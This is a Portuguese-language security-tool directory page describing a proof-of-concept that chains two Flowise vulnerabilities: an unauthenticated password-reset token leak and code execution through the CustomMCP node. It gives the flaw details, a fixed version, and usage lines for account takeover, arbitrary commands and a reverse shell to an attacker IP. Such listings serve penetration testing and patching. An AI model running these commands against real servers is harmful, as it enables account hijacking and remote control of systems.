Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-58434-59528 — CVE-2025-58434 e CVE-2025-59528 — PoC de encadeamento | Kitploit
Ferramentas/GitHubGitHub/azureadtrent/cve-2025-58434-59528
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAutenticaçãoFerramenta de Acesso Remoto
GitHubazureadtrent/cve-2025-58434-59528

CVE-2025-58434-59528

CVE-2025-58434 e CVE-2025-59528 — PoC de encadeamento

Ver Repositório
47há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-58434 + CVE-2025-59528

Cadeia de exploração para duas vulnerabilidades afetando Flowise <= 3.0.5.


Vulnerabilidades

CVE-2025-58434 — Tomada de Conta Não Autenticada

O endpoint de redefinição de senha retorna um token válido de redefinição de senha na resposta da API sem exigir autenticação. Um atacante com conhecimento de um endereço de e-mail válido pode redefinir a senha de qualquer conta sem interação do usuário.

CVE-2025-59528 — Execução Remota de Código Autenticada

O nó CustomMCP passa entrada controlada pelo usuário diretamente para um construtor Function() com privilégios totais do Node.js. Um usuário autenticado com uma chave de API válida pode executar comandos arbitrários do sistema operacional como o usuário do processo Flowise.

Corrigido em: Flowise 3.0.6


Requisitos

  • Python 3.8+
  • pip install requests

Uso

Cadeia ATO completa (redefine senha, solicita chave de API, dispara reverse shell):

python3 flowise_chain.py -t http://target -e [email protected]

Apenas RCE (se você já tiver uma chave de API):

python3 flowise_chain.py -t http://target --api-key <KEY> -c "id"

Reverse shell com chave existente:

python3 flowise_chain.py -t http://target --api-key <KEY> --lhost 10.0.0.1 --lport 4444

Opções

FlagDescrição
-t, --targetURL alvo
-e, --emailE-mail da conta alvo (aciona a cadeia ATO)
--api-keyFornecer chave de API diretamente (pula a ATO)
-c, --commandComando a executar
--lhostIP do atacante para reverse shell
--lportPorta do atacante para reverse shell (padrão: 4444)
--new-passwordSenha a definir durante a redefinição (padrão: Pwn3d!2026)
-k, --insecureIgnorar verificação TLS

Notas

Devido a uma peculiaridade no Flowise 3.0.5, o endpoint de API de redefinição de senha não atualiza imediatamente a credencial aceita pelo endpoint de login. O script pausa após a redefinição e solicita que você faça login manualmente na interface e copie a chave de API de /apikey.

Baixar ferramenta